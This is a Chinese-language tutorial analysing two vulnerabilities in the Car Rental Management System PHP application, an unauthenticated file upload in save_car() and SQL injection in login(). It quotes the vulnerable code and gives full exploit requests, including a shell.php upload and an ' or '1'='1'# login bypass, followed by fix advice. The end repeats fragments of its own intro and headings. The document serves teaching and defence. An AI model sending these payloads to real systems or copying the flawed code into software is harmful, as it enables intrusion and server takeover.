Car Rental Management System 漏洞分析与利用教学文档<\/h1>

前言<\/h2>
本文档详细分析Car Rental Management System（车辆租赁管理系统）中存在的两类安全漏洞：未授权文件上传和SQL注入。该系统是一个国外的车辆信息发布管理系统，存在多处安全缺陷。<\/p>

一、未授权文件上传漏洞<\/h2>

漏洞位置<\/h3>
`admin\/admin_class.php<\/code> 文件中的 save_car()<\/code> 函数（第282-309行）<\/p>`

漏洞代码分析<\/h3>
function<\/span> save_car<\/span>(){
<\/span><\/span>    extract<\/span>($_POST);
<\/span><\/span>    $data =<\/span> ""<\/span>;
<\/span><\/span>    foreach<\/span>($_POST as<\/span> $k =><\/span> $v){
<\/span><\/span>        if<\/span>(!<\/span>in_array<\/span>($k, array<\/span>('id'<\/span>,'img'<\/span>,'description'<\/span>)) &&<\/span> !<\/span>is_numeric<\/span>($k)){
<\/span><\/span>            if<\/span>(empty<\/span>($data)){
<\/span><\/span>                $data .=<\/span> " <\/span>$k<\/span>='<\/span>$v<\/span>' "<\/span>;
<\/span><\/span>            }else<\/span>{
<\/span><\/span>                $data .=<\/span> ", <\/span>$k<\/span>='<\/span>$v<\/span>' "<\/span>;
<\/span><\/span>            }
<\/span><\/span>        }
<\/span><\/span>    }
<\/span><\/span>    $data .=<\/span> ", description = '"<\/span>.<\/span>htmlentities<\/span>(str_replace<\/span>("'"<\/span>,"&#x2019;"<\/span>,$description)).<\/span>"' "<\/span>;
<\/span><\/span>    if<\/span>($_FILES['img'<\/span>]['tmp_name'<\/span>] !=<\/span> ''<\/span>){
<\/span><\/span>        $fname =<\/span> strtotime<\/span>(date<\/span>('y-m-d H:i'<\/span>)).<\/span>'_'<\/span>.<\/span>$_FILES['img'<\/span>]['name'<\/span>];
<\/span><\/span>        $fname =<\/span> str_replace<\/span>(" "<\/span>, ''<\/span>, $fname);
<\/span><\/span>        $move =<\/span> move_uploaded_file<\/span>($_FILES['img'<\/span>]['tmp_name'<\/span>],'assets\/uploads\/cars_img\/'<\/span>.<\/span> $fname);
<\/span><\/span>        $data .=<\/span> ", img_path = '<\/span>$fname<\/span>' "<\/span>;
<\/span><\/span>    }
<\/span><\/span>    if<\/span>(empty<\/span>($id)){
<\/span><\/span>        $save =<\/span> $this-><\/span>db<\/span>-><\/span>query<\/span>("INSERT INTO cars set <\/span>$data<\/span>"<\/span>);
<\/span><\/span>    }else<\/span>{
<\/span><\/span>        $save =<\/span> $this-><\/span>db<\/span>-><\/span>query<\/span>("UPDATE cars set <\/span>$data<\/span> where id = <\/span>$id<\/span>"<\/span>);
<\/span><\/span>    }
<\/span><\/span>    if<\/span>($save)
<\/span><\/span>        return<\/span> 1<\/span>;
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>漏洞原理<\/h3>

直接接收前端传入的文件数据，未对文件内容进行任何校验<\/li>
仅使用时间戳+原始文件名生成新文件名（未过滤危险扩展名）<\/li>
文件直接保存到assets\/uploads\/cars_img\/<\/code>目录下<\/li>
无任何权限验证，未授权用户也可上传文件<\/li>
<\/ol>
漏洞复现步骤<\/h3>

构造恶意POST请求：<\/li>
<\/ol>
POST \/admin\/ajax.php?action=save_car HTTP\/1.1  
Host: 目标IP  
Content-Type: multipart\/form-data; boundary=----WebKitFormBoundaryX98edFXJqWpvI5cf  

------WebKitFormBoundaryX98edFXJqWpvI5cf  
Content-Disposition: form-data; name="id"  

------WebKitFormBoundaryX98edFXJqWpvI5cf  
Content-Disposition: form-data; name="brand"  
111  
------WebKitFormBoundaryX98edFXJqWpvI5cf  
Content-Disposition: form-data; name="model"  
111  
------WebKitFormBoundaryX98edFXJqWpvI5cf  
Content-Disposition: form-data; name="category_id"  
5  
------WebKitFormBoundaryX98edFXJqWpvI5cf  
Content-Disposition: form-data; name="engine_id"  
3  
------WebKitFormBoundaryX98edFXJqWpvI5cf  
Content-Disposition: form-data; name="transmission_id"  
3  
------WebKitFormBoundaryX98edFXJqWpvI5cf  
Content-Disposition: form-data; name="description"  
111111111  
------WebKitFormBoundaryX98edFXJqWpvI5cf  
Content-Disposition: form-data; name="price"  
10  
------WebKitFormBoundaryX98edFXJqWpvI5cf  
Content-Disposition: form-data; name="qty"  
10  
------WebKitFormBoundaryX98edFXJqWpvI5cf  
Content-Disposition: form-data; name="img"; filename="shell.php"  
Content-Type: application\/octet-stream  

<?php phpinfo();?>  
------WebKitFormBoundaryX98edFXJqWpvI5cf--
<\/code><\/pre>

服务器返回"1"表示上传成功<\/li>
访问上传的webshell：http:\/\/目标IP\/assets\/uploads\/cars_img\/[时间戳]_shell.php<\/code><\/li>
<\/ol>
修复建议<\/h3>

添加文件类型白名单验证<\/li>
重命名文件时强制修改扩展名为安全类型<\/li>
添加权限验证，确保只有授权用户可上传<\/li>
对上传文件内容进行安全检查<\/li>
<\/ol>
二、SQL注入漏洞<\/h2>
漏洞位置<\/h3>
admin\/admin_class.php<\/code> 文件中的 login()<\/code> 函数（第18-38行）<\/p>
漏洞代码分析<\/h3>
function<\/span> login<\/span>(){
<\/span><\/span>    extract<\/span>($_POST);        
<\/span><\/span>    $qry =<\/span> $this-><\/span>db<\/span>-><\/span>query<\/span>("SELECT * FROM users where username = '"<\/span>.<\/span>$username.<\/span>"' and password = '"<\/span>.<\/span>md5<\/span>($password).<\/span>"' "<\/span>);
<\/span><\/span>    if<\/span>($qry-><\/span>num_rows<\/span> ><\/span>0<\/span>){
<\/span><\/span>        foreach<\/span> ($qry-><\/span>fetch_array<\/span>() as<\/span> $key =><\/span> $value) {
<\/span><\/span>            if<\/span>($key !=<\/span> 'passwors'<\/span> &&<\/span> !<\/span>is_numeric<\/span>($key))
<\/span><\/span>                $_SESSION['login_'<\/span>.<\/span>$key] =<\/span> $value;
<\/span><\/span>        }
<\/span><\/span>        if<\/span>($_SESSION['login_type'<\/span>] !=<\/span> 1<\/span>){
<\/span><\/span>            foreach<\/span> ($_SESSION as<\/span> $key =><\/span> $value) {
<\/span><\/span>                unset<\/span>($_SESSION[$key]);
<\/span><\/span>            }
<\/span><\/span>            return<\/span> 2<\/span> ;
<\/span><\/span>            exit<\/span>;
<\/span><\/span>        }
<\/span><\/span>        return<\/span> 1<\/span>;
<\/span><\/span>    }else<\/span>{
<\/span><\/span>        return<\/span> 3<\/span>;
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>漏洞原理<\/h3>

直接将用户输入的username<\/code>参数拼接到SQL查询中<\/li>
未使用预处理语句或任何过滤\/转义措施<\/li>
返回1表示登录成功，可被利用绕过认证<\/li>
<\/ol>
漏洞复现步骤<\/h3>

构造恶意POST请求：<\/li>
<\/ol>
POST \/admin\/ajax.php?action=login HTTP\/1.1
Host: 目标IP
Content-Type: application\/x-www-form-urlencoded; charset=UTF-8

username=admin' or '1'='1'#&password=任意密码
<\/code><\/pre>

服务器返回"1"表示登录成功<\/li>
<\/ol>
修复建议<\/h3>

使用预处理语句（PDO或mysqli_prepare）<\/li>
对用户输入进行严格的过滤和转义<\/li>
实施最小权限原则，限制数据库用户权限<\/li>
添加登录失败次数限制<\/li>
<\/ol>
总结<\/h2>
Car Rental Management System存在严重安全漏洞，攻击者可利用：<\/p>

未授权文件上传漏洞获取服务器控制权<\/li>
SQL注入漏洞绕过认证获取管理员权限<\/li>
<\/ol>
开发人员应重视安全编码实践，对所有用户输入进行严格验证，并实施适当的权限控制机制。<\/p>

Car Rental Management System 漏洞分析与利用教学文档<\/h1>

前言<\/h2> 本文档详细分析Car Rental Management System（车辆租赁管理系统）中存在的两类安全漏洞：未授权文件上传和SQL注入。该系统是一个国外的车辆信息发布管理系统，存在多处安全缺陷。<\/p>

一、未授权文件上传漏洞<\/h2>

漏洞位置<\/h3> admin\/admin_class.php<\/code> 文件中的 save_car()<\/code> 函数（第282-309行）<\/p>

二、SQL注入漏洞<\/h2>

漏洞位置<\/h3> admin\/admin_class.php<\/code> 文件中的 login()<\/code> 函数（第18-38行）<\/p>

前言<\/h2>
本文档详细分析Car Rental Management System（车辆租赁管理系统）中存在的两类安全漏洞：未授权文件上传和SQL注入。该系统是一个国外的车辆信息发布管理系统，存在多处安全缺陷。<\/p>

漏洞位置<\/h3>
`admin\/admin_class.php<\/code> 文件中的 save_car()<\/code> 函数（第282-309行）<\/p>`

漏洞位置<\/h3>
`admin\/admin_class.php<\/code> 文件中的 login()<\/code> 函数（第18-38行）<\/p>`